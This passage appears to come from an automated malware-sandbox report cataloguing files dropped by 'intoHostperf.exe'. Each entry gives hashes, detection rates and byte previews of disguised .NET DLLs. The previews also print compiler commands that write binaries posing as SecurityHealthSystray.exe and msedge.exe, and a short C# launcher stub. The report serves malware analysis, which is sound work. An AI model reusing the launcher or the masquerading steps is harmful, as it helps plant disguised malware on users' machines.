                                                            Preview:.C:\Browserhost> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\smysgui2\smysgui2.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                            C:\Users\user\AppData\Local\Temp\y4s1cmk0\y4s1cmk0.0.cs

                                                            Download File
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                            Category:dropped
                                                            Size (bytes):382
                                                            Entropy (8bit):4.931502418856896
                                                            Encrypted:false
                                                            SSDEEP:6:V/DBXVgtSaIb2Lnf+eG6L2/t5oeTckufwlxFK8wM2Lnf+eG6L29JaHiFK8wQAv:V/DNVgtDIbSf+eBL6LzIfiFkMSf+eBLf
                                                            MD5:56FC493D052DD72D651237E55E622F75
                                                            SHA1:F9AC5DB88F60D963DCEB293E0923A17D4414C969
                                                            SHA-256:D69B1AEC2706B399E541A4FE846945233CB728E19BD3537FD39D9AB64F3A495D
                                                            SHA-512:C6869E71C1E09D9D2CCBF99BA351D0EC470F753B284145C06BA255FD02E18B379A364E82E70CA2B01A00D8C9EAB810D67BAE271E221E0C1F7BBEF225D9956EDE
                                                            Malicious:false
                                                            Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Recovery\upfc.exe"); } catch { } }).Start();. }.}.

                                                            C:\Users\user\AppData\Local\Temp\y4s1cmk0\y4s1cmk0.cmdline

                                                            Download File
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):266
                                                            Entropy (8bit):5.160375182068438
                                                            Encrypted:false
                                                            SSDEEP:6:Hu+H2L//1xRf5oeTckKBzxsjGZxWE8o923fDQMh:Hu7L//TRRzscQy7QMh
                                                            MD5:EA3D2B03F568AF474AF5EE11F2ACAFA5
                                                            SHA1:5098B16283F61132165EF552717254F16D001B72
                                                            SHA-256:B6E5947934CD3AF01DA0AF560ED07BA9E6B43375DCD0752ADEDEEFCF752FBB5C
                                                            SHA-512:5E262228B17AE170F8B33A990BC0A52AB820764EE96CAF261024433FDBBE458140435B0DBF2FB769C71AA7B62BC4A9295CF7BBFDB5B0AC43F94BCE44CEDE3668
                                                            Malicious:true
                                                            Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\y4s1cmk0\y4s1cmk0.0.cs"

                                                            C:\Users\user\AppData\Local\Temp\y4s1cmk0\y4s1cmk0.out

                                                            Download File
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (337), with CRLF, CR line terminators
                                                            Category:modified
                                                            Size (bytes):758
                                                            Entropy (8bit):5.252378629848441
                                                            Encrypted:false
                                                            SSDEEP:12:1I/u7L//TRRzscQy7QMEKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:1I/un/VRzsty7DEKax5DqBVKVrdFAMBt
                                                            MD5:1CC1E098A3146BA96515C4AAE670F4B1
                                                            SHA1:59BE467EEC54657F7AF1EA91CBE17B69A515C386
                                                            SHA-256:6D68E53A68DA57F4F74591B7E5B1AF0BB50EB099957AED3112CE83B63FAA2260
                                                            SHA-512:FBE1D99410C6EC72007B1C5DA9F989DE0D87D26E7329960B696FAD21A8E4A42759FC03922800027DC12926F4CA92BAA4E6F5018C4CBDB8F280BA086426728F05
                                                            Malicious:false
                                                            Preview:.C:\Browserhost> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\y4s1cmk0\y4s1cmk0.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                            C:\Users\user\Desktop\AkShQvXv.log

                                                            Download File
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):33280
                                                            Entropy (8bit):5.634433516692816
                                                            Encrypted:false
                                                            SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                            MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                            SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                            SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                            SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 8%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                            C:\Users\user\Desktop\CdhQCsIu.log

                                                            Download File
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):38400
                                                            Entropy (8bit):5.699005826018714
                                                            Encrypted:false
                                                            SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                            MD5:87765D141228784AE91334BAE25AD743
                                                            SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                            SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                            SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 25%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                            C:\Users\user\Desktop\DaJYXsXp.log

                                                            Download File
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):34816
                                                            Entropy (8bit):5.636032516496583
                                                            Encrypted:false
                                                            SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                            MD5:996BD447A16F0A20F238A611484AFE86
                                                            SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                            SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                            SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 21%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                            C:\Users\user\Desktop\GTYGJoJn.log

                                                            Download File
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):32256
                                                            Entropy (8bit):5.631194486392901
                                                            Encrypted:false
                                                            SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                            MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                            SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                            SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                            SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 25%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                            C:\Users\user\Desktop\HhGhtKRk.log

                                                            Download File
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):23552
                                                            Entropy (8bit):5.519109060441589
                                                            Encrypted:false
                                                            SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                            MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                            SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                            SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                            SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 8%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                            C:\Users\user\Desktop\NzFoXiJZ.log

                                                            Download File
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):126976
                                                            Entropy (8bit):6.057993947082715
                                                            Encrypted:false
                                                            SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                            MD5:16B480082780CC1D8C23FB05468F64E7
                                                            SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                            SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                            SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 21%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

                                                            C:\Users\user\Desktop\QQZxdmXS.log

                                                            Download File
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):70144
                                                            Entropy (8bit):5.909536568846014
                                                            Encrypted:false
                                                            SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                            MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                            SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                            SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                            SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 29%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                            C:\Users\user\Desktop\QuHEOinP.log

                                                            Download File
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):50176
                                                            Entropy (8bit):5.723168999026349
                                                            Encrypted:false
                                                            SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                            MD5:2E116FC64103D0F0CF47890FD571561E
                                                            SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                            SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                            SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 17%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                            C:\Users\user\Desktop\TBFNkAhL.log

                                                            Download File
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):342528
                                                            Entropy (8bit):6.170134230759619
                                                            Encrypted:false
                                                            SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                            MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                            SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                            SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                            SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 50%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                            C:\Users\user\Desktop\TkyvVenI.log

                                                            Download File
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):38912
                                                            Entropy (8bit):5.679286635687991
                                                            Encrypted:false
                                                            SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                            MD5:9E910782CA3E88B3F87826609A21A54E
                                                            SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                            SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                            SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 8%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                            C:\Users\user\Desktop\WuUwVxTJ.log

                                                            Download File
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):69632
                                                            Entropy (8bit):5.932541123129161
                                                            Encrypted:false
                                                            SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                            MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                            SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                            SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                            SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 50%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                            C:\Users\user\Desktop\XrvErxiE.log

                                                            Download File
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):46592
                                                            Entropy (8bit):5.870612048031897
                                                            Encrypted:false
                                                            SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                            MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                            SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                            SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                            SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 5%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                            C:\Users\user\Desktop\ZuimMgmz.log

                                                            Download File
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):33792
                                                            Entropy (8bit):5.541771649974822
                                                            Encrypted:false
                                                            SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                            MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                            SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                            SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                            SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 38%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                            C:\Users\user\Desktop\bnxVycYy.log

                                                            Download File
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):34304
                                                            Entropy (8bit):5.618776214605176
                                                            Encrypted:false
                                                            SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                            MD5:9B25959D6CD6097C0EF36D2496876249
                                                            SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                            SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                            SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 9%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                            C:\Users\user\Desktop\jcBCwIrh.log

                                                            Download File
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):39936
                                                            Entropy (8bit):5.629584586954759
                                                            Encrypted:false
                                                            SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                            MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                            SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                            SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                            SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 17%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                            C:\Users\user\Desktop\kIWsDnNZ.log

                                                            Download File
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):39936
                                                            Entropy (8bit):5.660491370279985
                                                            Encrypted:false
                                                            SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                            MD5:240E98D38E0B679F055470167D247022
                                                            SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                            SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                            SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 8%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                            C:\Users\user\Desktop\nBlbpjyY.log

                                                            Download File
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):40448
                                                            Entropy (8bit):5.7028690200758465
                                                            Encrypted:false
                                                            SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                            MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                            SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                            SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                            SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 12%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                            C:\Users\user\Desktop\pEXJLSDT.log

                                                            Download File
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):64000
                                                            Entropy (8bit):5.857602289000348
                                                            Encrypted:false
                                                            SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                            MD5:5EE7E079F998F80293B3467CE6A5B4AE
